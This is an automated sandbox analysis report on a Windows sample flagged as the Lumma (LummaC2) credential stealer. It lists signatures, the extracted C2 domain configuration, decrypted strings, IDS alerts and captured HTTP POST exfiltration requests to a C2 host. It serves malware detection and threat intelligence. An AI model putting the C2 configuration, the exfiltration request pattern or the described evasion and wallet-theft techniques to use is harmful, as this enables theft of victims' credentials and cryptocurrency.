
Windows Analysis Report
LisectAVT_2403002A_236.exe

Overview

General Information

Sample name: LisectAVT_2403002A_236.exe
Analysis ID: 1482389
MD5: 8ecbc517b61cdb069495b3f3e3887a0f
SHA1: 4b9170f6fe8e1b77fa1462efd4299930479f98cd
SHA256: 4c98f158e7654d83e23027e9c94b5a6d27837c3e0302e0619b7540fe1387645e
Tags: exe, RaccoonStealer
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected VMProtect packer
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LisectAVT_2403002A_236.exe (PID: 6236 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_236.exe" MD5: 8ECBC517B61CDB069495B3F3E3887A0F)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "unhappytidydryypwto.shop"], "Build id": "GjKsB2--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
No Snort rule has matched

Timestamp: 2024-07-25T22:14:44.163830+0200
SID: 2051469
Source Port: 54364
Destination Port: 53
Protocol: UDP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:45.734706+0200
SID: 2054653
Source Port: 49706
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-25T22:15:01.133815+0200
SID: 2022930
Source Port: 443
Destination Port: 49713
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-25T22:14:48.209574+0200
SID: 2048094
Source Port: 49708
Destination Port: 443
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-07-25T22:14:44.698527+0200
SID: 2051476
Source Port: 49706
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:55.547747+0200
SID: 2051476
Source Port: 49712
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:46.553302+0200
SID: 2051476
Source Port: 49707
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:50.869302+0200
SID: 2051476
Source Port: 49710
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:53.722138+0200
SID: 2051476
Source Port: 49711
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:47.703503+0200
SID: 2051476
Source Port: 49708
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:48.905289+0200
SID: 2051476
Source Port: 49709
Destination Port: 443
Protocol: TCP
Classtype: Domain Observed Used for C2 Detected

Timestamp: 2024-07-25T22:14:47.027495+0200
SID: 2054653
Source Port: 49707
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-25T22:14:49.759772+0200
SID: 2048094
Source Port: 49709
Destination Port: 443
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-07-25T22:14:55.552815+0200
SID: 2843864
Source Port: 49712
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: LisectAVT_2403002A_236.exe | Avira: detected
Source: associationokeo.shop | Avira URL Cloud: Label: malware
Source: https://unhappytidydryypwto.shop/api#: | Avira URL Cloud: Label: phishing
Source: unhappytidydryypwto.shop | Avira URL Cloud: Label: phishing
Source: https://unhappytidydryypwto.shop/ | Avira URL Cloud: Label: phishing
Source: colorfulequalugliess.shop | Avira URL Cloud: Label: phishing
Source: https://unhappytidydryypwto.shop:443/api | Avira URL Cloud: Label: phishing
Source: turkeyunlikelyofw.shop | Avira URL Cloud: Label: malware
Source: https://unhappytidydryypwto.shop/api | Avira URL Cloud: Label: phishing
Source: detectordiscusser.shop | Avira URL Cloud: Label: malware
Source: https://unhappytidydryypwto.shop/apin:L | Avira URL Cloud: Label: phishing
Source: relevantvoicelesskw.shop | Avira URL Cloud: Label: phishing
Source: https://unhappytidydryypwto.shop/44 | Avira URL Cloud: Label: phishing
Source: 0.2.LisectAVT_2403002A_236.exe.3b0000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "unhappytidydryypwto.shop"], "Build id": "GjKsB2--"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: LisectAVT_2403002A_236.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: associationokeo.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: turkeyunlikelyofw.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: pooreveningfuseor.pw
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: edurestunningcrackyow.fun
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: detectordiscusser.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: relevantvoicelesskw.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: colorfulequalugliess.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: wisemassiveharmonious.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: unhappytidydryypwto.shop
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp | String decryptor: GjKsB2--
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C4F69 CryptUnprotectData, | 0_2_003C4F69
Source: LisectAVT_2403002A_236.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: LisectAVT_2403002A_236.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000080h] | 0_2_003D3216
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esi+00000080h] | 0_2_003D3216
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000080h] | 0_2_003D3216
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000080h] | 0_2_003D12E2
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh | 0_2_003C541A
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esp+10h] | 0_2_003B95E0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then lea esi, dword ptr [edx+ecx] | 0_2_003CD860
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+04h] | 0_2_003C390E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esi+08h] | 0_2_003E2156
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then movzx eax, byte ptr [esi+ecx] | 0_2_003BD1C0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then test esi, esi | 0_2_003E52C9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then jmp ecx | 0_2_003E3458
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then jmp eax | 0_2_003E4489
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esi+04h] | 0_2_003C05BD
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_003DD620
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esp+28h] | 0_2_003C561D
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000080h] | 0_2_003D3216
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esi+00000080h] | 0_2_003D3216
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000080h] | 0_2_003D3216
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esp+000000A8h] | 0_2_003C4810
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then jmp eax | 0_2_003C19E7
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then jmp ecx | 0_2_003BFA7F
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then jmp ecx | 0_2_003BFA72
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h] | 0_2_003B7B20
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [003EDC58h] | 0_2_003CCB43
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov edi, dword ptr [esi+0Ch] | 0_2_003CFB8E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esp+10h] | 0_2_003CCB80
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, dword ptr [esi+08h] | 0_2_003E2C52
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esi+00000080h] | 0_2_003D0D8E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov ecx, dword ptr [esi+04h] | 0_2_003C0E43
Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 4x nop then mov eax, edi | 0_2_003E4FB2

Networking

Source: Malware configuration extractor | URLs: associationokeo.shop
Source: Malware configuration extractor | URLs: turkeyunlikelyofw.shop
Source: Malware configuration extractor | URLs: pooreveningfuseor.pw
Source: Malware configuration extractor | URLs: edurestunningcrackyow.fun
Source: Malware configuration extractor | URLs: detectordiscusser.shop
Source: Malware configuration extractor | URLs: relevantvoicelesskw.shop
Source: Malware configuration extractor | URLs: colorfulequalugliess.shop
Source: Malware configuration extractor | URLs: wisemassiveharmonious.shop
Source: Malware configuration extractor | URLs: unhappytidydryypwto.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: unhappytidydryypwto.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: unhappytidydryypwto.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 13684 | Host: unhappytidydryypwto.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 16199 | Host: unhappytidydryypwto.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20574 | Host: unhappytidydryypwto.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1379 | Host: unhappytidydryypwto.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 584281 | Host: unhappytidydryypwto.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: unhappytidydryypwto.shop
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: unhappytidydryypwto.shop
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.0000000001419000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1372307247.0000000001469000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462355021.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1463876472.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unhappytidydryypwto.shop/
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1418365611.0000000001466000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1405389775.0000000001465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unhappytidydryypwto.shop/44
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1410106897.000000000146C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unhappytidydryypwto.shop/api
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unhappytidydryypwto.shop/api#:
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unhappytidydryypwto.shop/apin:L
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://unhappytidydryypwto.shop:443/api
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49707 version: TLS 1.2
